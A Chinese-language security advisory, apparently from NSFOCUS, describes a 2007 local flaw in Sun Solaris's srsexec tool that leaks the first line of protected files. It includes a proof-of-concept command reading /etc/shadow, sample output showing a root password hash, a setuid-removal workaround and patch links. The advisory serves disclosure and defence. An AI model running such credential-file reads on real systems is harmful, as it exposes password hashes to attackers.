安全研究

安全漏洞
Sun Solaris srsexec任意文件读取本地信息泄露漏洞

发布日期:2007-05-10
更新日期:2007-05-14

受影响系统:
Sun SRS Net Connect Software 3.2.4
Sun SRS Net Connect Software 3.2.3
描述:
BUGTRAQ  ID: 23915

Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。

Solaris系统的srsexec工具在处理文件访问权限时存在漏洞,本地攻击者可能利用此漏洞读取部分敏感文件内容。

如果安装了SUNWsrspx软件包的话,则该软件包中的srsexec工具可能允许本地攻击者访问敏感信息,如root口令哈希。漏洞起因是没有丢弃或检查目标文件的权限,如果用户指定了verify only模式(-v)及debug(-d)模式的话,且指定了受保护的文件(如/etc/shadow),srsexec就会在debug消息中显示/etc/shadow的第一行。

<*来源:iDEFENSE
  
  链接:http://secunia.com/advisories/25194/
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102891-1
        http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=531
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED
  verify_binary(OWNED)
  srsexec: binary_name: OWNED
  srsexec: name_buf:    OWNED_______________
  binaries file line:   root:omhyabndnAtNw:6
  binaries file line:   :6445::::::
  smmsp:NP
  Security verification failed for binary: OWNED
  see SYSLOG(/var/adm/messages) for errors

建议:
临时解决方法:

* 删除srsexec二进制程序的setuid位:

  # chmod -s /opt/SUNWsrspx/bin/srsexec

厂商补丁:

Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-102891)以及相应补丁:
Sun-Alert-102891:Security Vulnerability in Sun Remote Services (SRS) Net Connect Software
链接:http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102891-1

补丁下载:
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-125713-01-1
http://sunsolve.sun.com/search/document.do?assetkey=urn:cds:docid:1-21-123870-02-1

浏览次数:2673
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障